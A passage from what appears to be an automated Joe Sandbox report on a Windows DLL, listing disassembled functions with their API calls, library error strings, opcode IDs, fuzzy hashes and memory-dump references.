                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: ArraySafe$Data$AccessCreateUnaccessVector_malloc_memmove
                                                          • String ID:
                                                          • API String ID: 583974297-0
                                                          • Opcode ID: 09c840e05b8280bc5fe1535b373282a863d7a055248c2cd3bb23dfeff5f957dd
                                                          • Instruction ID: a1465d9433ffca60e7c0d0c8bc5a9389a06b473a03cd9fd440f411213d76c986
                                                          • Opcode Fuzzy Hash: 09c840e05b8280bc5fe1535b373282a863d7a055248c2cd3bb23dfeff5f957dd
                                                          • Instruction Fuzzy Hash: 521163B2A10118BBCB14DFA6D880DDFBB7CDF99754B018269F904A7600EA709A058BE0
                                                          Function 6CF75A70 Relevance: 6.1, APIs: 4, Instructions: 65COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • VariantInit.OLEAUT32(?), ref: 6CF75AB9
                                                          • VariantCopy.OLEAUT32(?,6CFE9C90), ref: 6CF75AC1
                                                          • VariantClear.OLEAUT32(?), ref: 6CF75AE2
                                                          • __CxxThrowException@8.LIBCMT ref: 6CF75AEF
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: Variant$ClearCopyException@8InitThrow
                                                          • String ID:
                                                          • API String ID: 3826472263-0
                                                          • Opcode ID: 22796edea9773ffdec2bbafa15c31e61a44d241cd2b7f8b76b9e04124faf21c3
                                                          • Instruction ID: ceababf1839d1bb3ad929824ab662cc0b3843efad54de29cac33ac3426936503
                                                          • Opcode Fuzzy Hash: 22796edea9773ffdec2bbafa15c31e61a44d241cd2b7f8b76b9e04124faf21c3
                                                          • Instruction Fuzzy Hash: 3211E672D05268AFDF11DF98D8C4ADFBB78EB46614F11426BE824A3700C775AE0487E1
                                                          Function 6CF88D80 Relevance: 6.1, APIs: 4, Instructions: 54COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • _malloc.LIBCMT ref: 6CF88D8A
                                                            • Part of subcall function 6CFB9D66: __FF_MSGBANNER.LIBCMT ref: 6CFB9D7F
                                                            • Part of subcall function 6CFB9D66: __NMSG_WRITE.LIBCMT ref: 6CFB9D86
                                                            • Part of subcall function 6CFB9D66: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,00000000,?,6CFB9BD4,6CF51290,CA0C7769), ref: 6CFB9DAB
                                                            • Part of subcall function 6CFB91F6: std::_Lockit::_Lockit.LIBCPMT ref: 6CFB9202
                                                          • _malloc.LIBCMT ref: 6CF88DAF
                                                          • std::exception::exception.LIBCMT ref: 6CF88DD4
                                                          • __CxxThrowException@8.LIBCMT ref: 6CF88DEB
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: _malloc$AllocateException@8HeapLockitLockit::_Throwstd::_std::exception::exception
                                                          • String ID:
                                                          • API String ID: 3043633502-0
                                                          • Opcode ID: 03616a26d5ebc220fa5aa0320aa639e8f636499d488438775d95620b77d2668d
                                                          • Instruction ID: 25009b51044faf3f43cefe1209cb5e6cc80a63fa253df8cd2765ca158a57f952
                                                          • Opcode Fuzzy Hash: 03616a26d5ebc220fa5aa0320aa639e8f636499d488438775d95620b77d2668d
                                                          • Instruction Fuzzy Hash: 29F0F07380521167D200EB679C41BEF76F89FA1715F44081DF864A1B00EB31E70C82B3
                                                          Function 6CFC0A60 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                          • String ID:
                                                          • API String ID: 3016257755-0
                                                          • Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                          • Instruction ID: 6dec1479e2d6d6a60038ab6016221e60e9c04a6c398be612ee84eba956145e4e
                                                          • Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                          • Instruction Fuzzy Hash: C9117EB320418ABBCF065E84DC51CDF3F22BB19358F598515FE2859930C376C5B2AB82
                                                          Function 6CFB8970 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 175COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: _memmove_memset
                                                          • String ID: EncodingParameters
                                                          • API String ID: 3555123492-55378216
                                                          • Opcode ID: a26fa20f6e5a38139a21893c90924e8d00c7b8068a34221745ed7a8bb954fcad
                                                          • Instruction ID: 25c8dbf2fa07315167ef3212e32b56c88059fa2620790448976928d017396669
                                                          • Opcode Fuzzy Hash: a26fa20f6e5a38139a21893c90924e8d00c7b8068a34221745ed7a8bb954fcad
                                                          • Instruction Fuzzy Hash: 1C61F2B4208341AFC304CF69C880A1AFBE9AFC9754F144A1DF59987391D7B0E945CBA2
                                                          Function 6CF5F190 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 148COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 6CF54760: __CxxThrowException@8.LIBCMT ref: 6CF547F9
                                                            • Part of subcall function 6CF88D80: _malloc.LIBCMT ref: 6CF88D8A
                                                            • Part of subcall function 6CF88D80: _malloc.LIBCMT ref: 6CF88DAF
                                                          • _memcpy_s.LIBCMT ref: 6CF5F282
                                                          • _memset.LIBCMT ref: 6CF5F293
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: _malloc$Exception@8Throw_memcpy_s_memset
                                                          • String ID: @
                                                          • API String ID: 3081897325-2766056989
                                                          • Opcode ID: 05d39606c188922ac61d012a73e55a50b175fcebbb823a90ab2220e14a51a000
                                                          • Instruction ID: 952947ff52a104397e5c72311fe564b98d8c052e2957a622580103c930cb2554
                                                          • Opcode Fuzzy Hash: 05d39606c188922ac61d012a73e55a50b175fcebbb823a90ab2220e14a51a000
                                                          • Instruction Fuzzy Hash: F551BDB1A00248DFDB10CFA4D881BDEBBB4BF55308F108199D9596B781DBB16A09CF92
                                                          Function 6CF54100 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 116COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • std::_Xinvalid_argument.LIBCPMT ref: 6CF54175
                                                          • _memmove.LIBCMT ref: 6CF541C6
                                                            • Part of subcall function 6CF54010: std::_Xinvalid_argument.LIBCPMT ref: 6CF5402A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: Xinvalid_argumentstd::_$_memmove
                                                          • String ID: string too long
                                                          • API String ID: 2168136238-2556327735
                                                          • Opcode ID: 82d66f1b01316716338fe7552e393a4ef0a73cf8df5557c73722f3b4a67c5064
                                                          • Instruction ID: d3b286ad93a60bbaec7604a4f73c69c1cb8120e0767fcd84e15d420c76fa6aeb
                                                          • Opcode Fuzzy Hash: 82d66f1b01316716338fe7552e393a4ef0a73cf8df5557c73722f3b4a67c5064
                                                          • Instruction Fuzzy Hash: CB31E4323046105BD3228E5CAC80A5BFBE9EBB1764BA10A1BE691C7F40C761987497A1
                                                          Function 6CF8C350 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 104COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __CxxThrowException@8.LIBCMT ref: 6CF8C39B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: Exception@8Throw
                                                          • String ID: gfff$gfff
                                                          • API String ID: 2005118841-3084402119
                                                          • Opcode ID: 0fc975951894ecdd0a9fd187ee17f5a7dd85dbf523fbdf3c3300f41ba2466e2d
                                                          • Instruction ID: 76688bbb48107995f8cd52597a5f614f99ab70f006474a0281a06c795b7bd170
                                                          • Opcode Fuzzy Hash: 0fc975951894ecdd0a9fd187ee17f5a7dd85dbf523fbdf3c3300f41ba2466e2d
                                                          • Instruction Fuzzy Hash: 4E314071A0020DAFDB14CF98DD80EEEB7B9EB84718F44861CE91597684D730BA09CBA1
                                                          Function 6CF518C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 6CF54010: std::_Xinvalid_argument.LIBCPMT ref: 6CF5402A
                                                          • __CxxThrowException@8.LIBCMT ref: 6CF5194F
                                                            • Part of subcall function 6CFBAC75: RaiseException.KERNEL32(?,?,6CFB9C34,CA0C7769,?,?,?,?,6CFB9C34,CA0C7769,6CFE9C90,6CFFB974,CA0C7769), ref: 6CFBACB7
                                                          • std::exception::exception.LIBCMT ref: 6CF5198E
                                                            • Part of subcall function 6CFB95C1: std::exception::operator=.LIBCMT ref: 6CFB95DA
                                                            • Part of subcall function 6CF54010: std::_Xinvalid_argument.LIBCPMT ref: 6CF54067
                                                            • Part of subcall function 6CF54010: _memmove.LIBCMT ref: 6CF540C8
                                                          Strings
                                                          • Clone() is not implemented yet., xrefs: 6CF518ED
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: Xinvalid_argumentstd::_$ExceptionException@8RaiseThrow_memmovestd::exception::exceptionstd::exception::operator=
                                                          • String ID: Clone() is not implemented yet.
                                                          • API String ID: 2192554526-226299721
                                                          • Opcode ID: 289678064193d5c8500e17b87f6bf6b6bbf7f12323d2d18e783c600216ef401d
                                                          • Instruction ID: 22aaee7dc1a45cb7007c5f1955be41ddccf076aea5b963d93ca4967af8eadcfd
                                                          • Opcode Fuzzy Hash: 289678064193d5c8500e17b87f6bf6b6bbf7f12323d2d18e783c600216ef401d
                                                          • Instruction Fuzzy Hash: 983130B1C04248AFDB14CF99D841BEEFFB8EB15714F14466EE421A7B90D775AA08CB50
                                                          Function 6CF85560 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 95COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 6CF54010: std::_Xinvalid_argument.LIBCPMT ref: 6CF5402A
                                                          • __CxxThrowException@8.LIBCMT ref: 6CF85657
                                                            • Part of subcall function 6CFBAC75: RaiseException.KERNEL32(?,?,6CFB9C34,CA0C7769,?,?,?,?,6CFB9C34,CA0C7769,6CFE9C90,6CFFB974,CA0C7769), ref: 6CFBACB7
                                                          Strings
                                                          • StringStore: missing InputBuffer argument, xrefs: 6CF855E0
                                                          • InputBuffer, xrefs: 6CF855BF
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: ExceptionException@8RaiseThrowXinvalid_argumentstd::_
                                                          • String ID: InputBuffer$StringStore: missing InputBuffer argument
                                                          • API String ID: 3718517217-2380213735
                                                          • Opcode ID: 7658aec960ecf026226845b837d2e4f196cd5a3a445a48e27d5a0da59186f7b7
                                                          • Instruction ID: f41fe1e5861de3a9d6c5009c1535b27d6996c600585f4197c0e89a6ac48855ba
                                                          • Opcode Fuzzy Hash: 7658aec960ecf026226845b837d2e4f196cd5a3a445a48e27d5a0da59186f7b7
                                                          • Instruction Fuzzy Hash: BD4138B15083809FD320CF29C490A9BFBF4BB99714F548A1DF5E983790DB759908CB52
                                                          Function 6CF51EA0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 94COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 6CF54010: std::_Xinvalid_argument.LIBCPMT ref: 6CF5402A
                                                          • __CxxThrowException@8.LIBCMT ref: 6CF51F36
                                                            • Part of subcall function 6CFBAC75: RaiseException.KERNEL32(?,?,6CFB9C34,CA0C7769,?,?,?,?,6CFB9C34,CA0C7769,6CFE9C90,6CFFB974,CA0C7769), ref: 6CFBACB7
                                                          • std::exception::exception.LIBCMT ref: 6CF51F6E
                                                            • Part of subcall function 6CFB95C1: std::exception::operator=.LIBCMT ref: 6CFB95DA
                                                            • Part of subcall function 6CF54010: std::_Xinvalid_argument.LIBCPMT ref: 6CF54067
                                                            • Part of subcall function 6CF54010: _memmove.LIBCMT ref: 6CF540C8
                                                          Strings
                                                          • CryptoMaterial: this object does not support precomputation, xrefs: 6CF51ED4
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: Xinvalid_argumentstd::_$ExceptionException@8RaiseThrow_memmovestd::exception::exceptionstd::exception::operator=
                                                          • String ID: CryptoMaterial: this object does not support precomputation
                                                          • API String ID: 2192554526-3625584042
                                                          • Opcode ID: 08bbd9e491b1246304728a2f93764e06ebb86e594027289b0469167df4d40d76
                                                          • Instruction ID: 765f1f1d89ddee8cab57d1017ea658aeb0e6d9713be1503ece97b8c3637af342
                                                          • Opcode Fuzzy Hash: 08bbd9e491b1246304728a2f93764e06ebb86e594027289b0469167df4d40d76
                                                          • Instruction Fuzzy Hash: EF3141B1D04248AFCB14CF99D840BDEFBB8FB19714F14866EE421A7B90D775AA08CB50
                                                          Function 6CF63317 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 90COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __CxxThrowException@8.LIBCMT ref: 6CF63327
                                                            • Part of subcall function 6CFBAC75: RaiseException.KERNEL32(?,?,6CFB9C34,CA0C7769,?,?,?,?,6CFB9C34,CA0C7769,6CFE9C90,6CFFB974,CA0C7769), ref: 6CFBACB7
                                                          • std::_Xinvalid_argument.LIBCPMT ref: 6CF6336B
                                                            • Part of subcall function 6CFB90D8: std::exception::exception.LIBCMT ref: 6CFB90ED
                                                            • Part of subcall function 6CFB90D8: __CxxThrowException@8.LIBCMT ref: 6CFB9102
                                                            • Part of subcall function 6CFB90D8: std::exception::exception.LIBCMT ref: 6CFB9113
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: Exception@8Throwstd::exception::exception$ExceptionRaiseXinvalid_argumentstd::_
                                                          • String ID: vector<T> too long
                                                          • API String ID: 1735018483-3788999226
                                                          • Opcode ID: a165b119964948c5ce711740cff449676f38b3cacf78ded830312fd97061aaf9
                                                          • Instruction ID: 0f9d004133a2fb17f9304cfe1a0dfaf5c96da391760c652b64f82b847edde769
                                                          • Opcode Fuzzy Hash: a165b119964948c5ce711740cff449676f38b3cacf78ded830312fd97061aaf9
                                                          • Instruction Fuzzy Hash: FB31F771E042159FCB24DF99D881F9EB7B4EB45314F104639E929ABB90DB31BD04CB91
                                                          Function 6CF75810 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 76COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • std::_Xinvalid_argument.LIBCPMT ref: 6CF7584D
                                                            • Part of subcall function 6CFB90D8: std::exception::exception.LIBCMT ref: 6CFB90ED
                                                            • Part of subcall function 6CFB90D8: __CxxThrowException@8.LIBCMT ref: 6CFB9102
                                                            • Part of subcall function 6CFB90D8: std::exception::exception.LIBCMT ref: 6CFB9113
                                                          • VariantClear.OLEAUT32(00000000), ref: 6CF75899
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
